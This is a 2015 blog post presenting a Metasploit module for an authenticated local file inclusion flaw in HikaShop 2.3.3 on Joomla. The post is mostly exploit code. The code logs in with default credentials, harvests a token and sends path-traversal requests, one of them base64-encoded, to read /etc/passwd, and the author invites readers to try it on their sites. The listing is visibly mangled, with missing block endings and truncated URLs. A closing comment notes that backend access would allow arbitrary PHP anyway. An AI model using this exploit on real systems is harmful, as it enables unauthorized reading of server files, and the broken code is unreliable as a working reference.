Saturday, 3 January 2015

[EN] HikaShop LFI - Metasploit module

Nearly 2 weeks ago I wrote a little article about vulnerabilities in multiple plugins for Joomla.

Here we talked about creating your own proof-of-concept for Metasploit. So now it should be a good time to prepare something more useful.

Below you will find a dirty MSF poc for LFI vulnerability located in HikaShop 2.3.3. ;)

Let me know if your Joomla is vulnerable. ;) If you will have any troubles with running this poc,
just check how I've done that before or feel free to contact me with any questions/suggestions.

Loading exploit:


... and finally we will get the content of /etc/passwd:

root@kali:/var/www/pocs# cat hikashop_auth_lfi.rb
# This module requires Metasploit: http//
# Current source:

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
      'Name' => 'HikaShop - LFI poc for authenticated users',
        'Description' => %q{
                HikaShop 2.3.3 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                Vulnerability was described on
      'Author' =>
          'HauntIT Blog', # Discovery / msf module
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
          [ 'Automatic', { } ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '03.01.2015'))
      ['TARGETURI', [ true, "Base Joomla directory path", 'joomla']),'USERNAME', [ true, "Username to authenticate with", 'admin']),'PASSWORD', [ false, "Password to authenticate with", 'admin']),'FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
      ], self.class)

  def check

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    return nil

  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")

    print_status("[+] Resp code: " + req1.code.to_s)
    print_good("[+] Cookie(s) : " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Token : "+ token.to_s)
      print_status("[-] Token not found")

    # now we need to do auth using that token and cookies
    print_status("[+] 2nd request (post with auth)")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1

    print_good("[+] Code after auth: " + auth.code.to_s)

    # 3rd step: get + post params to lfi
    print_status('[+] and now 3rd request...')
    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_hikashop',
                 'ctrl'  => 'view',
                 'task'  => 'edit',
                 'id'    => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
        'cookie'        => cookies

    if xpl
      print_good("[+] 3rd response code: " + xpl.code.to_s)
      print_good("[+] 3rd (full) response body:")
      fail_with("[-] Cannot exploit it :C")
  end # exploit


And pastebin version is here.

Happy New Year! ;)

1 comment:

  1. This requires you to have access to the backend of the website AND access to the view edition interface of hikashop. There, you can directly edit any view of hikashop and add custom PHP into them. So no need to go to all that trouble. Just add a line of PHP code in one of the views to read the file you want on the server.


What do You think...?